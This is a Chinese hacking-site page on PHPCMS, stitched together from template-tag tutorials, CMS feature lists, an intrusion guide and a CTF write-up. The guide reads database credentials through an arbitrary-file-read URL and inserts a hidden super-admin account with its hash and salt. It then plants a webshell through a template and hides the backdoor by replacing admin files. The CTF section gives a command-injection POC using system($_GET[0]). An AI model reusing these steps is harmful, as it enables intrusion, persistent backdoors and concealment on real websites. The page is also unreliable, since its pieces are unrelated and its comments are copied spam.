右侧
黑客技术
当前位置:网站首页 > 渗透网站 > 正文

phpcms渗透工具_渗透app工具

作者:hacker发布时间:2023-03-01分类:渗透网站浏览:231评论:3


导读:phpcms怎么编辑内容页首先需要找到数据库里面的表,表对应的是v9_page,对应的模板文件是\modules\content\templates\content_,打开编辑...

phpcms 怎么编辑内容页

首先需要找到数据库里面的表,表对应的是v9_page,对应的模板文件是\modules\content\templates\content_,打开编辑,以增加一个内容里面的一个主标题和副标题为例,打开单页面的编辑页面,就会发现多了两个input标签了。

PHPCMS是一款网站管理软件。该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。

它支持众多的程序组合,可轻松实现网站平台迁移,并可广泛满足各种规模的网站需求,可靠性高,是一款具备文章、下载、图片、分类信息、影视、商城、采集、财务等众多功能的强大、易用、可扩展的优秀网站管理软件。

PHPCMS由国内80后知名创业者钟胜辉(网名:淡淡风)于2005年创办,是国内知名的站长建站工具。2009年,PHPCMS创办人钟胜辉离开PHPCMS,创办国内针对媒体领域的CMS产品CmsTop(思拓合众)。

Phpcms 是国内领先的网站内容管理系统,同时也是一个开源的PHP开发框架。Phpcms由内容模型、会员、问吧、专题、财务、订单、广告、邮件订阅、 短消息、自定义表单、全站搜索等20多个功能模块组成,内置新闻、图片、下载、信息、产品5大内容模型。Phpcms 采用模块化开发,支持自定义内容模型和会员模型,并且可以自定义字段。

PHPCMS V9中的GET怎么使用?

1.什么是phpcms 的 Get标签?

通俗来讲,get 标签是Phpcms定义的能直接调用数据库里面内容的简单化、友好化代码,她可调用本系统和外部数据,只有你对SQL有一定的了解,她就是你的绝世好剑! 也就是适合熟悉SQL语句的人使用。有了她,我们打造个性化的网站,能非常方便的调用出数据库里面指定的内容。通过条件限制,我们可以调用出不同条件下的 不同数据。

如果说,我不懂SQL怎么办?没有问题,get 标签还有强大的创建工具(看这里),Phpcms2008 在新建模板和修改模板页面增加了 get 标签傻瓜式生成器,get 标签生成器可以帮助您列出指定数据源的数据表和字段,通过填空和选择方式生成可用的 get 标签代码。Phpcms2008 首次提供了最全面的数据字段,对本系统任何数据表和字段都提供了中文说明,这也会大大降低 get 标签的使用难度。

phpcms V9 保留了2008的get标签的使用方法

它包括了2种方式一种是内部数据,

另一种是外部数据

1、外部数据的调用

{ pc : get sql = "SELECT * FROM phpcms_member" cache = "3600" page = "$page" dbsource = "discuz" return = "data" }

{ loop $data $key $val }

{ $val [ username ]} br /

{ /loop}

{ $pages }

{/ pc }

一个是数据源,一个是产生的pages翻页

我们再分析下内部数据的使用方法

2、内部数据的调用

{pc:get sql="SELECT * FROM `XX` WHERE fid =$ltid AND digest =2 AND ifupload =1 ORDER BY tid DESC" num="2" cache= "3600" return="data" }

{loop $data $r}

。。。。。

{/loop}{/pc}

由此可以看出 get 语句支持num的用法但是不支持 limit 5,5.这样的用法

实在是很遗憾

num是调用的条数

get 标签参数完整剖析

{get dbsource="数据源" dbname="数据库" sql="SQL语句" rows="行数" return="返回变量名称" page="$page"}

输出代码(含返回变量值、数组、函数等)

{/get}

复制代码

dbsource="数据源" --

服务器装什么软件 phpcms注入漏洞

本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)

1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。

例如将data.txt放置在yun.baidu.com/j0192/data.txt

2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞)。

/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php

3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号

username字段:admn

password字段:10203d4623c1957d041818196ff9822a

encrypt 字段:bGV22e

issuper 字段: 1

4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。

用户名:admn

密码:123456

5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。

6、打开ifeng.com/caches/caches_template/default/wap/data.class.php

用户名:admin

密码:admin

7、隐藏新增加的管理员。

通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。

8、隐藏新增加的关联链接

通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))

9、将目标网站的漏洞修复,以防其他黑客入侵。

通过木马脚本上传替换/phpcms/modules/search/index.php

防黑参考:

1、关闭数据库远程访问。

2、静态文件及附件等文件目录禁止执行权限。

3、脚本文件目录禁止写权限。

4、系统后台等重要目录限制IP访问。

5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。

哪种PHPCMS好

几款PHP CMS介绍

PHPCMS

phpcms 2.0 由原9466article升级升级更名而来,是一个可以全站生成html的综合网站内容管理系统,能适应大中型网站的需求。

目前PHPCMS以新闻文章管理系统为主,同时有公告管理、友情链接管理、数据库管理、语言管理、风格模板管理、用户管理、JS文件管理等小的辅助功能模块。PHPCMS集多功能于一体让用户实现在线可视化管理网站,因此安装和使用PHPCMS无须专业知识。

[主要功能]

1、全站生成html,减轻服务器负载,提高访问速度,更容易被搜索引擎收录,是大中型站点的必然选择。

2、多语言支持,语言包与程序分离,目前默认支持简体中文、繁体中文和英文三种语言,用户还可以自己添加其他语言,前后台可以设置不同的语言界面。

3、多数据库支持,目前默认支持mysql数据库,我们在后期会逐步加入其他数据库支持

4、多模板支持,各栏目和专题都可选用不同的模板,而且全部从后台控制。

5、多风格支持,每种模板又可具有不同的色调风格,各栏目和专题都可选用不同的色调风格,而且全部从后台控制。

6、采用ewebeditor正版在线编辑器,具备frontpage和dreamweaver的绝大部分常用功能,支持数学公式,支持艺术字,支持各种文件的上传和插入

7、多管理员,可自由划分权限

8、支持无限级分类,满足各种不同的应用需求

9、栏目控制参数非常多,比如可设置是否允许发表评论、外部连接、是否开放、栏目模板、栏目风格等等

10、支持回收站,可避免很多误操作造成的不必要的损失

11、支持专题设置,可随时根据需要开设不同的专题,而且可锁定过期专题,锁定后该专题就不会出现在发表文章的专题列表里(在专题非常多的时候很有用)

12、支持公告,可设置有效期,过期后不再显示

13、支持友情链接,既可后台填加也可前台申请,支持JS远程调用以应用于其他的系统

14、支持广告管理,可自由填加广告位,自由发布图片、FLASH、文字和代码广告,可随时全面控制整个网站的广告

15、支持数据库备份,可同时备份到服务器和本地计算机,以确保安全

16、支持文章、公告、友情链接和广告管理的纯静态型JS调用,并且可以在线设置JS的相关参数

17、升级支持,智能化升级提示保证随时了解并升级到最新版本信息,后期我们还会增加智能化网络自动安装和升级支持,完全在线操作无需FTP即可实现安装和升级。

18、可在线导入新的模板和风格,在线编辑模板和风格

19、后台全傻瓜式控制整个网站,一旦安装成功后即可在线管理而无须FTP或者另做网页

20、支持文章自动分页和手动分页

21、支持投稿、评论、搜索

22、支持栏目、文章等各种批量操作

23、支持自动获取远程图片

24、支持图片文章,还可根据文章参数的设置文章的标题样式

25、支持文章审核、置顶、推荐

26、支持web发送email给好友推荐文章给站长留言

织梦内容管理系统

织梦内容管理系统特点:

1、基于PHP+MySQL的技术构建,支持全生成静态文章和文章列表,加速你的网站访问速度,增强搜索引擎优化;

2、强大的后台管理,权限分为网络管理员、频道编辑、信息采编三种,完全适应各种中小型政府网站、个人网站和普通企业网站的应用;

3、可任意设置文章的浏览权限,支持会员在线申请为不同级别的权限;

4、定义了针对不同类型内容的各种向导,包括:普通文章向导、专题创建向导、图集发布向导、软件下载向导和Flash向导;

5、包含站内新闻、投票、友情链接管理等模块,支持会员投稿功能;

6、内置站点文件浏览器、图片浏览器、完美的数据备份方案;

7、内置针对入门用户和的主页创建向导,可轻松生成网站首页;

8、XML名字空间样式的模板代码,更清晰、更简单明了,支持双重模板技术,代码更灵活,支持RSS 2.0……

野猫 ymCMS

功能说明:

1. 前台使用模板技术,程序和界面分离;

2. 支持web安装方式,简单易用;

3. 上传功能分离,可上传多种类型文件,可统一管理上传的文件;

4. 标题和内容都支持BB代码;

5. 支持推荐给朋友功能;

6. 由WEB后台管理系统设置;

7. 支持批量编辑/修改;

8. 支持搜索功能;

9. 可进行用户分组,按不同用户组设定不同权限;

10. 支持多风格选择,可按系统,论坛/分类,用户设定风格;

11. 支持悄悄话功能;

12. 支持缓存功能,可有效减少对数据库的读取和加快速度;

13. 可分别设定用户组在论坛/分类中的浏览,发表,编辑和删除的权限;

14. 支持ip禁止功能,可禁止设定的ip或ip段不能访问系统;

15. 支持字词过滤功能;

16. 上传文件可设置存放路径;

17. 后台可检查,修复和优化数据表,可分卷备份和分卷还原数据;

18. 论坛支持无限分级,并分别设置版主;(BB)

19. 支持PHP/JS调用论坛主题;(BB)

20. 精华贴功能;(BB)

21. 内部论坛、只读论坛支持,可关闭主题;(BB)

22. 支持在论坛首页、板块页面直接进入最新主题的连接;(BB)

23. 板块页面、主题页面快速发表主题/回复帖子功能;(BB)

24. 随机表情图标功能;(BB)

25. 论坛/分类置顶功能可分级别;(BB)

26. 文章分类支持无限分级,并分别设置版主;(Info)

27. 支持HTML可视化编辑,可根据不同用户组设定权限;(Info)

28. 支持 [page] 分页和按篇分页,按篇分页可为每页设定小标题;(Info)

29. 首页图片信息功能;(Info)

30. 一句话信息,相关链接功能,文章带简介和图片;(Info)

31. 稿件置顶功能;(Info)

32. 相关信息功能;(Info)

33. 评论功能,前后台均可管理评论;(Info)

34. 稿件字体放大缩小功能;(Info)

35. 支持PHP/JS调用某类别或所有类别的最新/最热门信息;(Info)

36. 支持按用户组设定稿件审核功能;(Info)

37. 稿件可按分类设定是否生成准静态文件,存放路径可设置;(Info)

38. 前后台均可管理稿件;(Info)

39. 其他功能...

CMSware

CMSware全新的系统结构,处处体现了自由的思想,让您体验自由管理的非凡感受

1、所见即所得的编辑功能

CMSware的内容录入界面充分考虑内容维护人员的实际情况,他们可能不精通HTML,但他们会使用Word等办公软件,因此,系统界面与Word 等Office产品紧密集成,可直接从Word里拖动一块内容到CMSware中来。用户也可以在CMSware里直接进行文字的排版处理,比如改变字体名称,字体大小,字体颜色,背景颜色,以及对齐样式等等。还可以透明地插入图片,并可以任意调整图片的位置、大小,与文字进行环绕等等。系统还支持插入 Flash动画,超级连接、特殊字符等等。系统会自动将插入的图片、Flash 等文件上传到系统中合适的目录,而无需用户关心这一切。

2、多级内容维护人员支持

CMSware使用基于角色的用户管理,通过添加不同权限的用户,你可以将一个网站的管理权限分配给不同的用户.即可以由多人同时管理一个网站. CMSware的用户管理模块使得一切都变得如此轻松.通过建立具有不同管理权限的用户组,可以将用户分成多种级别,超级管理员,分类管理员,以及最基本的文档录入,审核员。一篇内容从最初录入到最后发布到网站上,中间需要经过管理员审批。管理员登陆系统编辑文章并审批,保证内容及时地更新到网站上去。

3、先进的模板管理模块

我们充分研究了国内外的内容管理系统,发现他们大都能够实现结合模板自动生成页面,减轻了页面制作人员的工作量,但是模板制作本身缺要求有较高技术水平的人员,有些系统要求使用基于XML的程序语言XSLT来制作模板,有些系统要求UNIX下的TCL语言来写模板,真可谓是减少了HTML设计人员,却增加了XML编程人员,没有从根本上减轻用户的负担。

模板的目的是决定系统中录入的内容如何生成成HTML页面。模板其实跟一个普通的HTML页面差不多,在其中固定的位置,插入内容采编系统中输入的字段信息,就生成了最终的HTML页面。

系统提供所见即所得的模板编辑工具,一个普通的HTML制作人员经过短暂的培训即可制作模板。模板对于整个网站只需要一次性制作,即可一直使用。

在CMSware的前身iwpc里提供了一个类似word的所见即所得的可视化模板编辑器(WYSIWYG),可以直接让设计师就可自行完成整个模板的制作。编辑器集成系统资源调用标签和系统函数调用标签,你随时可以查阅调用标签.模板都是HTML文件,即可用在FrontPage里,也可以用在 Dreamwaver中,设计师只要先使用自己熟悉的工具,如FrontPage、Dreamwaver等做好静态的页面,然后,在适当的地方插入 CMSware调用标签,一个模板就做好了,不需写任何一行代码。"系统调用模板","系统调用函数文件",极大方便用户扩展系统功能. 程序还支持自定义js模板功能,使得文章列表的显示更加灵活,定制更加容易。

而在CMSware中采用类似XML的标签,同时兼容iWPC原有的调用函数标签,提供更先进、更强大的系统数据调用功能。并增加了Dreamwaver制作插件,能直接在Dreamwaver里使用菜单方式设计模板,不需要学习语法。

4、文件管理模块

文件管理模块为网站的管理人员提供了一个类似Windows Explorer界面的文件管理器,允许管理员像管理Windows的文件一样管理网站中的所有文件,包括图片文件、包含文件等。每个分类有独自的文件管理模块,以便支持不同的管理员同时对自己所管理分类中的文件进行管理。

5、多种发布机制(静态/动态)

CMSware可以将网站内容全部生成静态HTML文件,这样可以极大地节约主机资源,提高系统性能,全静态处理技术是做为构建大型站点的必要条件。无论是再强大的CPU,再高明的数据库,在大量用户访问的情况下也会当机的,而使用我们的程序会避免此类问题发生。这也就是为什么“新浪”“网易”甚至包括 SOHU的网站搜索界面都是静态发布的原因了。

CMSware还在前身版本iwpc的基础之上,增加了动态发布方式,让用户可以对内容页面进行更细致的权限和动态功能进行管理,实现动态网站。

6、专题管理

对于新闻类网站,当一些突发事件发生时,来不及专门新开栏目,这时可以将有关该事件的内容整理成一个专题。CMSware允许编辑自行根据情况随时增加新的专题,在第一时间给网站的访问者提供丰富的相关信息。专题中的内容即可以是从其他频道里挑选出来的,也可以直接让记者或编辑往该专题里录入内容。

7、强大的内容调用首页完全自主设计。

首页的多样化是吸引大多数网友的必须条件之一。CMSware分类栏目首页完全自主定义。包括图片新闻,显示是否调用时间,栏目,静态模块的放置位置等等。也就是说可以达到想做静态网页那样的效果,想怎么做就怎么做,唯一的区别是,她方便,刷新形成静态内容,或直接生成动态内容。

8、无限级分类

CMSware支持无级分类,你可以无限制的对分类建立子分类 。而不是固定的一级或者二级分类。更适合结构复杂的大中型网站。

9、支持搜索引擎

借助全静态发布技术,CMSware全部的HTML界面使您的网站出现在搜索引擎的几率大大增高。搜索可是大多数网友获得网络资源最主要的一步。可以说,而您选择CMSware发布网站,就是选择了搜索引擎的一个位置...

10、远程安全发布

CMSware支持远程发布,既支持对远程服务器和数据库的发布,使用CMSware可以对多个网站进行发布管理,实现了用一个网站管理工具对多个站点的同时管理,这样就减轻网站管理员的工作量。只要CMSware里设置好站点的发布地址,选择要发布的站点地址,然后就可以在CMSware里对站点进行远程管理了,在CMSware里编辑过的内容,CMSware就会自动的发布到已选择好的站点地址里。

由于管理服务器和发布服务器分离,还大大提高了网站管理服务器的安全,如果发布服务器出了问题,只要在管理服务器重新全部发布部署就可恢复网站。

11、自定义数据库(字段自定义)

CMSware彻底改变了新闻类网站发布系统的传统,为了更体现自由管理的精髓,增加了自定义内容模型的功能。用户可以利用这个功能方便定制自己的各种内容来发布(下载、音乐、图片册、产品展示、人才、酒店预定。。。),CMSware发布系统核心自动处理实现发布功能,还可以外挂配合专门的动态处理程序来实现特别处理。

12、语言包支持

通过简单的替换操作就可以更换成其它语言,方便的实现多语言版本。

13、多数据库支持

全新的数据库引擎,全面支持主流数据库。默认支持MySQL,并可以通过更换引擎接口就方便的更换到Oracle、MS SQL Server、PostgreSQL等主流数据库。

14、更加人性化的操作界面

支持右键菜单,大部分复杂操作只需点击鼠标即可轻松实现。类似Windows资源管理器的文件管理界面,基于Web页面随处管理网站内容。

15、简洁的内容管理工作流

特别适合大型综合门户的内容采编、投稿、审核工作流的实现,用户投稿界面与后台管理界面分离,投稿编辑只接触投稿层。从用户投稿到审核到发布,所有环节流程都由用户自己定夺,适应不同环境的应用要求。

16、自由的内容自动采集功能

CMSware还提供了专门的内容采集模块,经过设置,可以自动采集对应网站的内容,并且实现了图片资源自动本地化,从而可以大幅降低采编人员的工作量。

CMSware的自动采集功能不同于普通的采集模块,可以自由的分来源细项来设置要采集的内容,可以采集非常复杂的来源页面,并且可以配合内容模型自动归类整理。

17、更多自由特性

简洁的后台管理结构,没有复杂性,容易管理。

发布文件分卷保存目录可定制性,你可以实现2003/10/05/xxx.html或者2003-10-05/xxx.html这样的目录结构。

发布文件后缀可定制性,你可以使用html,shtml或者xml作为静态文件的后缀。

高级文章评论功能,可以实现类似sina的文章评论功能,高级搜索功能,方便资料查找。

分类模板继承:可以在新建目录时选择是否安装默认模板,如果你不对子分类设置内容页模板,该分类将自动继承上级分类的模板体系。

首页图片可以调用自动缩略图生成。结合调用页面显示的实际需求,可以自动把图文文章的图片生成缩略图,加快网页下载速度。

方便的发布助手,极大方便批量更新整个站点,你要做的只是点击几下鼠标,然后就去喝杯咖啡。

安装时可选的用户密码加密功能,支持“MD5”,“DES”,“none”三种模式,进一步强化系统安全。

文章支持多页显示,即一篇文章可以分成好几页,还支持相关文章连接。

系统支持过期内容自动归档,可以自己设置过期时间。

数据库优化和备份功能等等。

简洁明快的全自动安装过程。

随易

什么是Cmsez

随易全站系统(Cmsez)是门道科技推出的企业级建站平台系统,致力于帮助企业提高运作效率、降低建站成本、拓展商业机会,是一种高度可管理、低成本、易部署的IT建站平台。Cmsez集成了丰富的功能模块,包括用户管理、新闻发布、信息发布、产品展示、图片管理、附件管理、在线商店、资料下载、多媒体浏览/播放等。额外针对特殊行业,提供酒店房间预订、旅游线路预订、招聘信息管理、信息简报等功能模块。

企业建站系统是面向企业的,主要提供企业内部信息交流、对外商务沟通的服务。其目的是给企业提供更方便的展示方式,增强企业和客户之间信息共享和沟通能力,提高工作效率,减少企业宣传费用等,从而为企业节省开支,同时也能创造一种新型的企业文化。与其他同类产品相比,Cmsez是唯一一个提供一站式企业建站解决方案的系统,我们提供了涵盖企业网站各个方面的功能模块,并且我们强有力的开发队伍,保证企业网站绝不落伍。我们坚持“软件以用为本”的原则,努力使操作简单化、流程简洁话,力使无论企业规模、无论维护人员水平如何,都可以使用Cmsez架设一个企业网站。同时,我们提供广阔的扩展空间,使得企业发展的同时,可以以很少的成本,让企业网站同步前进。

Cmsez是门道公司应企业建站市场的需要推出的用于企业建站的新的核心技术品牌,该品牌从2003年11月份正式开始启用,它的前身是Xplus建站平台 (Xplus WCMS)。 Cmsez的中文名称是“随易”。

简练

Cmsez是一个高度继承化的系统,全部模块基于同一个内核,因此流程简洁、统一,操作人员无需专门针对每个模块进行操作培训即可掌握全部模块的操作方法,达到一处通,处处通的效果。

快速

Cmsez作为一个建站系统,与着传统建站方式或者定制开发建站方式在速度上相比,不可同日而语。从安装到完成一个简单企业网站的构建,如果资料完备,并排除美化工作,只需要3个小时的工作时间,极大的缩短了网站创建、部署、维护的时间。

协同

Cmsez架设的网站,具体分到各个栏目,可以分别设定一个或者多个管理员,同时基于web的B/S结构的设计,可以提供多人的信息的分散管理、不同部门的人员能够协同工作,完成一致的工作目标。

高效

Cmsez系统内置多个缓存系统,包括系统参数缓存,模板缓存,数据库缓存、站点结构缓存,并提供全站静态化输出机制。这些特性保证了系统的高性能以及极大的降低硬件的压力。

可扩展性

Cmsez系统极佳的内核特性,可以快速的定制和开发同类型的信息发布模块。采用先进的开放标准,保护每一项技术投资。

phpArticle 文章管理系统

phpArticle 2.0.0 详细功能解说

程序安装

全自动安装,只需要一两分钟时间就可以安装完成.

数据库支持

目前只支持 MySQL

安全性

比起前一版有了较大的提高

无限分类

分类没有任何数量限制.

无限子分类.子分类中可以再包含子分类.支持无限多级分类

新闻

只显示于首页,用于发布网站的最新动态.

可以自由分配发表新闻权限给不同的管理员.

文章

支持多页,没有页数限制.

文章使用 WYSIWYG (What you see is what you get) 所见即所得编辑器发布,非常方便,就象使用 FrontPage 编辑网页一样简单.还支持网页内容的复制与粘贴,即可以重一个网站简单的用鼠标选中内容复制,再在 WYSIWYG 编辑器中粘贴一下,就可以把该网页的内容,包括文字,图片,连接,等复制下来.

相关文章,在发布文章时,只要输入关键字,文章就会自动搜索相关的文章并显示在相关文章列表当中.

相关连接功能,这是由发布者输入该文章的相关连接.

文章评分,会员可以对文章进行评分.

文章评论,会员可以对文章进行评论,评论可以回复引用等.

所见即所得编程器

投稿

会员可以投稿,即发表文章.

而会员所发表的文章,必须通过管理员审批,才能显示.

图库

可以通过web的方式上传图片,每次可以同时上传多个图片.

图片以文件形式保存在服务器上,不必担心会占用你宝贵的数据空间.

上传的图片可以方便的通过 WYSIWYG 编辑器插入到文章中,WYSIWYG 编辑还具有图片预览功能.

会员机制

会员注册功能.

收藏夹,会员拥有自己的收藏夹,可以自由收藏文章

会员可以对文章进行评分

会员可以对文章进行评论

会员可以发表自己的文章

多个用户组别,用户可以更换组别,每个组别可以自由设置权限.管理员可以自由添加设置.

在线人数的统计.

多级管理

多级管理,可以分配给不同的用户管理不同的分类或所有分类,由管理员自由设置,还可以通过设不同组别的权限,实现管理权限的限制.基本的权限包括添加,编辑,删除,审批文章,添加,编辑,删除分类及子分类.添加,编辑,删除新闻.

默认有五个组别:超级管理员,普通管理员,一般会员,游客,待email激活会员

模板技术

模板把 html 代码与 PHP 代码完全的分离,只要通过修改这些被分离出来的html 代码,就可以达到修改界面的目的.

模板的修改非常简单,就只是编辑 html 代码.

可以同时拥有多套界面,每个分类也可以定义一套界面,不必担心每个页面都相同.

方便的后台模板管理机制,可以添加自定义模板,编辑默认模板,删除等操作.

模板搜索/替换功能,可以方便查找出想修改的地方,并方便的修改替换.

可以方便的备份或还原模板.备份只需要点击下载,就可以把当前的模板导出为文件并下载保存,而还原,则只是简单的选择所备份的文件并通过上传导入等操作即可以还原出备份的模板.

数据备份,修复,优化

系统自带数据库备份功能,可以有选择或无选择的备份所需要的数据.

同样,还具有数据库修复与优化功能,可以在某些情况下达到数据库修复或优化的目的.

我自己的站,用phpcms 2.4制作的:

【墨者学院】:CMS系统漏洞分析溯源(第2题)

背景介绍

某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。

实训目标

1、了解并熟练使用linux命令;

2、了解PHPCMS的后台地址及其他相关漏洞资料;

3、了解html源码的重要性。

解题方向

登录后台后执行linux系统命令,查看web源码。

靶场环境:可以看到使用了phpcms9.1.13版本的内容管理系统。

在网上可以找到,默认的后台登录地址为/admin.php,其实在robots.txt文件中也能够看到,应该养成查看robots.txt文件的习惯,里面还是有一些有用的信息的。

打开admin.php链接,发现用户和密码都是已经默认填好的,所以直接登录到后台管理里面去。

在网上看到有三种方法:第一种,使用拓展里面的木马查杀进行key文件的查找,但是我没有查到;第二种是利用远程命令执行的方法来进行目录的查看;第三种是在界面的模板里面写入一句话,再getshell。

第一种:phpcms后台低权限任意命令执行。

这个漏洞是在乌云中发布出来的,编号为WooYun-2015-0153630,具体的漏洞分析见: 。

利用的POC是:index.php?0=[命令]m=contentc=contenta=public_categorystype=addmenuid=822;${system($_GET[0])}pc_hash=vad6K3from=block

先ls查看目录,再查看key.txt文件即可。

第二种:一句话木马写入。

上面的方法只是查看目录文件,并没有拿到网站的权限。写入一句话,再用蚁剑来进行连接,然后拿权限,这种方法才是比较通用的。

在界面中的index.html文件中写入一句话,然后按index.php?m=search连接。虽然网上都可,但是不知道为啥我的蚁剑返回数据为空,失败……

1.phpcms的这个后台低权限命令执行漏洞,不太清楚具体适用于哪些版本,可以先记着,这个一个渗透点。

2.一般进入了cms后台管理,通用的方法就是找模板,写入一句话,连接,上传大马。

标签:phpcms渗透工具


已有3位网友发表了看法:

  • 访客

    访客  评论于 2023-03-02 02:22:11  回复

    新闻文章管理系统为主,同时有公告管理、友情链接管理、数据库管理、语言管理、风格模板管理、用户管理、JS文件管理等小的辅助功能模块。PHPCMS集多功能于一体让用户实现在线可视化管理网站,因此安装和使用PHPCMS无须专业知识。[主要功能]

  • 访客

    访客  评论于 2023-03-02 02:53:07  回复

    网站内容管理系统,能适应大中型网站的需求。 目前PHPCMS以新闻文章管理系统为主,同时有公告管理、友情链接管理、数据库管理、语言管理、风格模板管理、用户管理、JS文件管理等小的辅助功能模块。PHPCMS集多功能于一体让用户实

  • 访客

    访客  评论于 2023-03-02 05:14:56  回复

    return="data" }{loop $data $r}。。。。。{/loop}{/pc}由此可以看出 get 语句支持num的用法但是不支持 limit 5,5.这样的用法实在是很遗憾num是调用的条数get 标签参数完整剖析{get dbsource="数据源" db

欢迎 发表评论:

渗透网站排行
最近发表
标签列表